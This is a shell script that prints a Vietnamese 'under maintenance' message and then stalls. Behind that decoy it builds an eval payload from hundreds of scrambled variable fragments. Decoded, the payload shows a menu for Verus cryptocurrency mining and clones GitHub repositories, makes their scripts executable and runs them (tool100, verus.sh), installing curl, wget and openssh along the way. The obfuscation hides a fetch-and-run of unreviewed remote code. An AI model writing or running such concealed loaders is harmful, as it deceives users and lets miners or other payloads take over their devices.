echo "đang bảo trì quý khách vui lòng quay lại sau"
sleep 1
echo "đang bảo trì quý khách vui lòng quay lại sau"
sleep 1
echo "đang bảo trì quý khách vui lòng quay lại sau"
sleep 99999999
z="
";XBz='"$tr';hDz=' +x ';GEz='gpro';fBz='n]" ';AEz='url';YBz='  [A';sBz=' [bo';IBz='ev  ';KDz='curl';WBz='ng":';FCz='h2"L';nBz='PU"$';vz='h2"|';lBz=' |"';iBz='0"$d';Nz=''\''';eBz=' coi';cDz='vio.';fDz='vio ';MDz='ssh ';bz='anh1';PDz='cd .';uDz='lolc';ez='────';TDz='e ht';OBz='00"$';SBz='h2"M';Zz='ang"';GDz='inst';SDz='clon';Kz='luc=';NBz='ng"1';xDz='nsta';BBz='dmin';LDz='open';Iz='35;1';yBz='rate';oz=' too';IDz='wget';Uz='33;1';rDz='nt "';fz='─"$x';ACz=']" $';ECz='"   ';TBz='enu"';KCz='43" ';qz='.5 p';RBz='   |';cCz='us u';IEz='d +x';qBz='$tra';oDz='2 ]';mBz='h2"C';Ez='2='\''';BEz='0/mi';KBz='se64';hz='"•"$';EEz='cd m';RCz='$hon';EBz=':"$t';mz='    ';QDz='.';tz='   "';yDz='ll c';Vz='echo';dCz='bunt';yz='d"["';QBz='h2" ';jz='nh2"';iDz='tool';Dz='1m'\''';pBz='g":"';YDz='/Ngo';cBz='auto';ADz=' I T';ICz='0899';ZDz='cgia';SCz='g"👉';rz='ro 我';jDz='100 ';oBz='d"]"';NCz='ng"◉';UBz='$d"]';mCz='t';eCz='u]  ';gDz='hmod';FDz='apt ';Jz='m'\''';CEz='pro.';Gz='hong';FEz='inin';RDz='git ';CBz='"$d"';JDz=' -y';CDz='lcat';NEz='sh';VCz=' ver';pCz='t = ';Sz='[37;';BCz='"100';dBz=' dao';Hz='='\''[';lz='d"  ';FBz='rang';rBz='ng" ';HDz='all ';xCz='ant ';oCz=' $st';CCz='℅"$x';Qz='tran';gBz='$van';fCz='¦"';ZBz='uto]';mDz='l100';MBz=' $va';VBz='"$va';gz='"["$';Az='xanh';WDz='thub';Yz='["$v';HBz='en-d';QCz=' 𝟏"';DBz=']"$v';DCz='anh2';bBz='b] [';lDz='/too';LEz='./ve';cz='"]"$';JCz='7171';kCz='số: ';nz='我爱中国';aBz=' [ad';tDz=' T"|';jCz='hập-';UCz='ning';DEz='git';uBz='pu ]';tBz='ot c';bCz=' 𝟐"';kDz='&& .';jBz='"℅"$';NDz='-y';TCz=' 🄼i';Xz='nh1"';xz='───"';Lz=''\''[3';pDz='et f';vCz='et -';yCz='"W A';Rz='g='\''';ZCz='  "$';wBz='x] [';MEz='rus.';YCz='x]  ';GCz='ien ';Bz='1='\''';iz='1"]"';HEz='chmo';wDz='-y i';JBz=' [ba';HCz='He"$';sCz='clea';GBz='" di';gCz='read';LBz=']"  ';uz='$xan';XDz='.com';vBz=' [ma';aDz='u200';ODz='cd';PCz='luc"';LCz='─"';EDz='p 1';Wz=' $xa';BDz='"|lo';hCz=' -p"';uCz='figl';nDz='fi';dDz='&& c';lCz='" st';sDz='W AI';vDz='at';pz='l v1';xBz='hash';DDz='slee';wz='"';MCz=' $ho';XCz='ermu';Oz='d='\''';Mz='6;1m';rCz='then';OCz='‿◉"$';bDz='0/de';KEz='h';qDz=' sla';az='•"$x';kz=' |"$';iCz='└──n';UDz='tps:';ABz='h2"a';qCz='1 ]';JEz='us.s';sz='爱中国 ';Tz='vang';PBz='d"℅"';dz='2"──';eDz='d de';kBz='2"  ';wCz='f sl';tCz='r';Cz='[34;';nCz='if [';Fz='[32;';aCz='"∆"';Pz='[31;';WCz='us t';hBz='g"10';VDz='//gi';
eval "$Az$Bz$Cz$Dz$z$Az$Ez$Fz$Dz$z$Gz$Hz$Iz$Jz$z$Kz$Lz$Mz$Nz$z$Oz$Pz$Dz$z$Qz$Rz$Sz$Dz$z$Tz$Hz$Uz$Jz$z$Vz$z$Vz$z$Vz$z$Vz$Wz$Xz$Yz$Zz$az$bz$cz$Az$dz$ez$ez$ez$ez$ez$ez$ez$ez$ez$ez$fz$bz$gz$Tz$hz$Az$iz$z$Vz$Wz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$mz$tz$uz$vz$wz$z$Vz$Wz$jz$kz$Az$dz$ez$ez$ez$ez$ez$ez$ez$ez$ez$ez$xz$uz$vz$wz$z$Vz$Wz$jz$kz$yz$uz$ABz$BBz$CBz$DBz$Zz$EBz$FBz$GBz$HBz$IBz$JBz$KBz$LBz$MBz$NBz$OBz$PBz$uz$QBz$mz$mz$RBz$wz$z$Vz$Wz$jz$kz$yz$uz$SBz$TBz$UBz$VBz$WBz$XBz$Zz$YBz$ZBz$aBz$bBz$cBz$dBz$eBz$fBz$gBz$hBz$iBz$jBz$Az$kBz$lBz$z$Vz$Wz$jz$kz$yz$uz$mBz$nBz$oBz$gBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$wBz$xBz$yBz$ACz$Tz$BCz$CBz$CCz$DCz$ECz$lBz$z$Vz$Wz$jz$kz$yz$uz$FCz$GCz$HCz$oBz$gBz$pBz$qBz$rBz$ICz$JCz$KCz$gBz$hBz$iBz$jBz$Az$kBz$mz$mz$mz$mz$lBz$z$Vz$Wz$Xz$Yz$Zz$az$bz$cz$Az$dz$ez$ez$ez$ez$ez$ez$ez$ez$ez$ez$fz$bz$gz$Tz$hz$Az$iz$z$Vz$z$Vz$Wz$jz$ez$ez$ez$ez$ez$ez$ez$ez$ez$LCz$z$Vz$MCz$NCz$OCz$PCz$QCz$RCz$SCz$XBz$Zz$TCz$UCz$VCz$WCz$XCz$YCz$mz$ZCz$Gz$aCz$z$Vz$MCz$NCz$OCz$PCz$bCz$RCz$SCz$XBz$Zz$TCz$UCz$VCz$cCz$dCz$eCz$mz$ZCz$Gz$aCz$z$Vz$Wz$jz$ez$ez$ez$ez$ez$ez$ez$ez$ez$LCz$z$Vz$Wz$jz$fCz$z$gCz$hCz$iCz$jCz$kCz$lCz$mCz$z$nCz$oCz$pCz$qCz$z$rCz$z$sCz$tCz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$CDz$z$DDz$EDz$z$FDz$GDz$HDz$IDz$JDz$z$FDz$GDz$HDz$KDz$JDz$z$FDz$GDz$HDz$LDz$MDz$NDz$z$ODz$z$PDz$QDz$z$ODz$z$RDz$SDz$TDz$UDz$VDz$WDz$XDz$YDz$ZDz$aDz$bDz$cDz$RDz$dDz$eDz$fDz$dDz$gDz$hDz$iDz$jDz$kDz$lDz$mDz$z$nDz$z$nCz$oCz$pCz$oDz$z$rCz$z$sCz$tCz$z$uCz$pDz$qDz$rDz$sDz$tDz$uDz$vDz$z$DDz$EDz$z$FDz$wDz$xDz$yDz$AEz$z$RDz$SDz$TDz$UDz$VDz$WDz$XDz$YDz$ZDz$aDz$BEz$UCz$CEz$DEz$z$EEz$FEz$GEz$z$HEz$IEz$VCz$JEz$KEz$z$HEz$IEz$VCz$JEz$KEz$z$LEz$MEz$NEz$z$nDz"
